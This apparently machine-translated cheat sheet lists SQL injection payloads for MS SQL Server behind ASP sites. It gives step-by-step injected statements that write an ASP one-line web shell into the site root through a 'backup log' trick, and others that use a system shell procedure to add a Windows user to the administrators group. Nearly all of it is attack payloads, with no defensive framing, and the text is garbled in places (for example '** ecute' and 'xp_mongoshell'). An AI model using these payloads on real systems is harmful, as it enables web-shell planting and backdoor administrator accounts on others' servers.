Character Type
1. Restore the current database
; Alter database Current database set recovery full --
2. Create a table cmd
; Create table cmd (a image )--
3. Back up the current database to D: cmd1
; Backup log current database to disk = D: cmd1 with init --
4. insert a sentence code to the created table cmd.
; Insert into cmd (a) values (<% 25 ** ecute (request ("a") % 25> )--
5. Back up one sentence of code to the site root directory
; Backup log current database to disk = D: www_weboct.asp --
6. Complete
; Drop table created table --
----------------------------------
Number Type
1. Restore the current database
; Alter database Current database set recovery full --
2. Create a table cmd
; Create table cmd (a image )--
3. Back up the current database to D: cmd1
; Backup log current database to disk = D: cmd1 with init --
4. insert a sentence code to the created table cmd.
; Insert into cmd (a) values (<% 25 ** ecute (request ("a") % 25> )--
5. Back up one sentence of code to the site root directory
; Backup log current database to disk = D: www_weboct.asp --
6. Complete
; Drop table created table --
--------------------------------
Sa permission to create an administrator user
1. Determine whether injection exists; and 1 = 1; and 1 = 2
; And user_name () = dbo determines whether the current system's connected user is sa
2. Add the system administrator
; Exec master. dbo. xp_mongoshell net user wk wk90/add ;--
; Exec master. dbo. xp_mongoshell net localgroup administrators wk/add ;--